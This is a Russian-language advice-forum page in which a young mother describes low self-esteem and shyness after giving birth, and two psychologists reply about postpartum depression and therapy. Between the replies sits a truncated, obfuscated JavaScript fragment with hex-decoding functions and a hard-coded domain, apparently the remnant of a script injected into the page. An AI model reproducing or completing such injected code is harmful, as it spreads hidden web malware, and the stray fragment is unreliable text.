Низкая самооценка. Как ее повысить?

Анастасия 11.11.2015

Мне 21 год,замуж вышла в 19 по любви. Сейчас родила ребенка, не потолстела,не изменилась вроде никак. Но я не могу себе выбрать одежду,парфюм,косметику, хотя хочу,но чувствую,что я этого не достойна,что все равно то мне и ходить некуда, и деньги тратить жалко их не много,и ипотека... Мужу мне легко предоюложить одежду, с ним ему купить,но себе нет...с мамой на базаре смогла купить одно платье.и себя жалею,молодая,а уже ставлю на себе крест,что уже есть семья,одежда теперь не важна,я теперь взрослая,и не могу одеваться как те же ровестницы, но одинокие. Чувствкю,что у них жизнь еще будет красочной и насыщенной,а я уже достигла своего пика. Не могу сочетать вещи,все однообразно,одного цвета, в таком не стыдно сходить в гости к родителям и все. Еще когда думаю,что как же все плохо,начинаю думать, что я себя просто жалею,бывает у людей совсем все плохо...когда иду выбирать одежду или просто в продуктовый магазин с коляской,кажется,что на меня все смотрят и думают,что я некрасивая лохушка и малолетка,сама ребенок,а уже родила... Не могу выбирать ничего при посторонних,потому что думаю что же они обо мне подумают, а вдруг они подумают что я взяла самую дешевую вещь(так и есть) хотя какая разница...но не могу.хочк уйти домой,так и делаю.не могу с мужем ничего себе выбрать. Да и в сексе не хочу принимать участие,разрешаю ему быть со мной,но всего стесняюсь,я и раньше стеснялась,но надеялась,что и стеснение и оргазм придет после родов... Об этом еще много мыслей,но сложно сразу все выложить.

Здравствуйте, Анастасия.

Во многих культурах, до сих пор, существуют традиция ухода за мамой и ребенком после родов. Роженицу окружают теплом и заботой - женщины более старшего поколения, как бы помогая ей освоиться со своей новой ролью матери. Таким образом происходит процесс интроекции материнских качеств молодой женщиной.  Такой уход и забота, помогает принять на себя роль матери и справится с неполноценностью, которая захлестывает  молодую маму, потому как она на самом деле не знает, как быть матерью и как справится с этой новой для нее ролью.

Но в западной культуре,  этот обычай практически изжил себя и молодым мамам, очень часто, в одиночку приходится справляться с трудностями послеродового периода. На этом фоне  и возникают обычно послеродовые депрессии. Ведь совершенно понятно, что уход за ребенком, особенно за первенцем, дело непростое, требующее колоссальной ответственности. Эта ответственность настолько давит, что приводит к чувству неполноценности, которое распространяется не только материнскую функцию, но и на все остальные функции – женщины, как  жены; женщины, как сексуального партнера;  женщины как социальной единицы.

Поэтому женщина в этот период, особенно оставшись без поддержки старшего поколения очень часто испытывают, чувство  собственной неполноценности, стараются избегать социальных контактов, перестают ухаживать за собой , впадают в уныние.

Врачи называют этот период - периодом послеродовой депрессии. Следует также отметить, что чаще всего данному виду депрессий подвержены молодые женщины, у которых не сложились отношения с собственной матерью, которые испытывали дефицит материнских вливаний на протяжении всей жизни, поэтому процесс  взятия на себя роли матери для собственного ребенка, у них связан с большими трудностями.

Таким образом послеродовой период очень важен для внутри психического состояния женщины. В этот период, происходит рождение функционально «новой женщины». Женщина должна, избавиться от старых ролей и приобрести новые - все это происходит через скорбь и печаль.

Психотерапия, может оказать в данный период времени  очень большую помощь, известно, что женщинам с ребенком, очень тяжело бывает прибегнуть к данного рода помощи, нос сейчас, время современных технологий и консультации по skaip оказывают в этом неоценимую помощь. Обращайтесь, буду рада вам помочь.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "all-psy.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Маташкова Оксана Валерьевна, психолог Алматы

Здравствуйтее.Анастасия.У Вас очень много внутренних диструктивных мыслей.Ваша совесть живет внутри Вас,но ведет себя,как провокатор,изменяя Вам и предавая Вас.В этом суть Вашей проблемы.Когда совесть начнет Вас хвалить и ценить,Вы перестанете думать о том,какое впечатление Вы произвели на других и что о Вас думают.Вам будет достаточно того,что Вы сами о себе думаете(я волшебная,золотая и сказочная).Тогда Вы станете уверенной,поймете,как Вам относиться к самой себе и будете покупать именно то,что хотите сейчас.Вы больше не будете внутри гадким утенком,а станете женственной женщиной.В помощь скачайте книгу Эллис.Рационально-эмоциональная терапия.И поработайте над ней от полугода.Тогда совесть станет Вашей подругой со всеми приятными последствиями.Еще эффективнее-личная терапия.ОБращайтесь,помогу.

Каратаев Владимир Иванович,психотерапевт-психоаналитик Волгоград